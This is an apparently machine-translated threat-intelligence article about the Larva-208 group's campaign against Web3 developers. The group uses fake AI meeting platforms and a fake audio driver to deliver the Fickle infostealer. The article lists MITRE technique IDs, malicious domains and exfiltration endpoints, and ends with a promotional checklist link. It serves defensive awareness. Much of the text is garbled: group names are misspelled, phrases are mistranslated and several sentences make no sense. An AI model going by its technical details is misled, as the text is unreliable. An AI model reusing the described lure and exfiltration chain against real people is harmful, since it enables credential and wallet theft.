The threat actor group Larva-208 is well known for its phishing attacks and social engineering against English-speaking IT staff, and is targeted at Web3 developers.
Adopting a spearfishing link (T1566.002), the group seduces victims with a written request for a manufactured job or portfolio, and directs them to a fake AI workspace platform.
These deceptive sites, such as Domain norlax.ai (T1583.001), mimic legitimate services like TeamPilot.ai to build reliability.
Phishing targets Web3 developers
When involved, victims receive unique invitation codes and emails, leading to a simulated conference environment in which audio issues encourage downloading malware disguised as RealTek HD audio drivers (T1036.005).
Running this malicious file triggers an embedded PowerShell command (T1059.001) that connects to a Command and Control (C2) server (T1583.004) to retrieve and deploy Fickle Infostealer.
This malware systematically removes sensitive data, such as device names, hardware specifications, OS versions, IP addresses, installed programs, running processes, and geolocation via user credentials, and sends it back to the attacker's infrastructure (T1041).
LARVA-208 acquires phishing and C2 domains through FFV2's bulletproof hosting services, often shared with bright Mantis groups, resulting in attribution duplication of the cybersecurity community.
Campaign ingenuity lies in two main infection vectors. First, the attacker distributes conference links to social platforms such as X (formerly Twitter) and Telegram, and frags them as interview opportunities to developers interested in topics in blockchain and Web3.
The second exploits recruitment applications on platforms such as remote3.co for Crypto analyst roles. Here we will avoid the first legitimate Google Meet Sessions migration to share malicious Norlax AI links via Chat, platform warnings for suspicious downloads.
When participating in a fake call, the victim encounters an engineering audio driver error, prompting him to download from the audiorealtek.com/getfile.php endpoint.
The installer secretly runs PowerShell from setup.dll (T1204.002) while displaying the benign interface, and retrieves the fickle from a C2 domain like CJHSBAM.com.
Tactical evolution
This operation illustrates an evolution from the previous method of larva-208. This involved tricking victims to download .lnk files disguised as legitimate Windows script files (such as manage-bde.wsf), but adding hidden powershell commands to use the ampersand operator to download payloads from sellers like bitacid.net.
Currently, data exfiltration leverages text storage sites such as FileBin (T1567.003) for record-keeping, and major victim details OS, username, IP, geolocation, and antivirus information are inherited to notify.php on the C2 server via the web protocol (T1071.001).
According to Catalyst Report, in advanced setups, the collected intelligence is uploaded to an actor-controlled SilentPrism server for real-time monitoring.
The campaign highlights adaptation to new trends in RARVA-208, weaponizing AI tools and exploiting Web3 developer trust in the collaborative platform.
By harvesting cryptocurrency wallets, development qualifications and project data, the group moves from ransomware-centric monetization to illegal market data reselling.
This highlights vulnerability in high-value environments where traditional defenses are waning against socially designed infostealers like Fickle.
Cybersecurity experts recommend employing endpoint detection in PowerShell anomalies to check the reliability of your domain, avoid unsolicited downloads, and mitigate such threats.
Get Free Ultimate SOC Requirements Checklist Before you build, buy, or switch your SOC for 2025 - Download Now
